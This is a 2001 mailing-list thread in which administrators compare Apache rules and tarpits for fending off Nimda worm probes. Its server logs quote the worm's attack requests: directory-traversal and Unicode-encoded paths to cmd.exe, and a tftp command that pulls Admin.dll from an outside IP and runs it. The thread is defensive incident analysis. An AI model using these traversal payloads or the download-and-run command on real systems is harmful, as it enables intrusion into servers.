Security Incidents mailing list archives
RE: Nimda Apache RedirectMatch results
From: "David Leitko" <dvd () gotblues com>
Date: Wed, 19 Sep 2001 16:31:53 -0700
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I'm not having that experience.. I've thrown the following into my httpd.conf: (Server version: Apache/1.3.14) # bounce nimda RedirectMatch 415 (.*)\.exe(.*)$ and I still only get 16 probes per host. However, three of the probes don't return with 415 for some reason... same three probes on every "attack".. two return 400's and one returns 404... thoughts? xx - - [19/Sep/2001:16:13:46 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 415 316 xx - - [19/Sep/2001:16:13:48 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 415 316 xx - - [19/Sep/2001:16:13:55 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316 xx - - [19/Sep/2001:16:14:02 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316 xx - - [19/Sep/2001:16:14:03 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316 xx - - [19/Sep/2001:16:14:49 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316 xx - - [19/Sep/2001:16:14:50 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316 xx - - [19/Sep/2001:16:14:52 -0700] "GET /msadc/..%255c../..%255c../..%255c/ ..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316 xx - - [19/Sep/2001:16:15:03 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316 xx - - [19/Sep/2001:16:15:05 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 xx - - [19/Sep/2001:16:15:12 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316 xx - - [19/Sep/2001:16:15:19 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316 xx - - [19/Sep/2001:16:15:21 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 xx - - [19/Sep/2001:16:15:25 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 xx - - [19/Sep/2001:16:15:26 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316 xx - - [19/Sep/2001:16:15:29 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316 - -- David Leitko dvd () leitko net http://www.leitko.net PGP Fingerprint 9B5B 8853 2AA9 4546 211C 21DC 7D98 A825 8C88 0862 -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com> iQA/AwUBO6kqk32YqCWMiAhiEQLPAQCg+Dcb17ClDmyhVIvR0duh1yEIssgAoNCS UUvRPcjiX9husckmZ3ErAU27 =0z4A -----END PGP SIGNATURE-----
-----Original Message----- From: Michael Halls [mailto:mhalls () nielsen net] Sent: Wednesday, September 19, 2001 1:21 PM To: George Milliken Cc: Incidents () Securityfocus Com Subject: RE: Anyone????? FW: Concept Virus(CV) V.5 - Quick analysis update On Wed, 19 Sep 2001, George Milliken wrote:Maybe something like a rewrite rule RewriteEngine On RewriteRule ^.*/cmd.exe.* [FL] RewriteRule ^.*/root.exe.* [FL] This will send "forbidden" to systems trying those URLs and will stop rewrite processing.Actually this may increase the load to those servers. When the worm's probe recieves anything other than a 404 (not found) it makes several other requests to the server to exploit the machines. It first trys to copy the Admin.dll to the c:, d:, and e: drives: 216.156.1.151 - - [19/Sep/2001:12:30:13 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 51 "-" "-" 216.156.1.151 - - [19/Sep/2001:12:31:28 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20216.22.197.29%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 51 "-" "-" 216.156.1.151 - - [19/Sep/2001:12:32:43 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20216.22.197.29%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 51 "-" "-" 216.156.1.151 - - [19/Sep/2001:12:33:58 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20216.22.197.29%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 51 "-" "-" The worm then attempts to execute the Admin.dll 216.156.1.151 - - [19/Sep/2001:12:35:13 -0700] "GET /scripts/..%c1%1c../Admin.dll HTTP/1.0" 200 51 "-" "-" This has the effect of increasing the traffic about 5 fold. The worm also will continue to probe/exploit the machine after it gets a "hit" so a machine that returns 403 (forbidden) for each of the 16 attacks would get about 80 hits to their website from each machine. Playing around with some cgi scripts that tarpit requests it looks like the worm's tcp connections time out after 1 minute 30 seconds without a response. By sleeping my script for about 1 minute 15 seconds I can hold a machine in my "tarpit" for about an hour and a half. Does anybody know if this thing is single threaded?
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- RE: Anyone????? FW: Concept Virus(CV) V.5 - Quick analysis update George Milliken (Sep 19)
- RE: Anyone????? FW: Concept Virus(CV) V.5 - Quick analysis update Michael Halls (Sep 19)
- RE: Nimda Apache RedirectMatch results David Leitko (Sep 19)
- RE: Anyone????? FW: Concept Virus(CV) V.5 - Quick analysis update Michael Halls (Sep 19)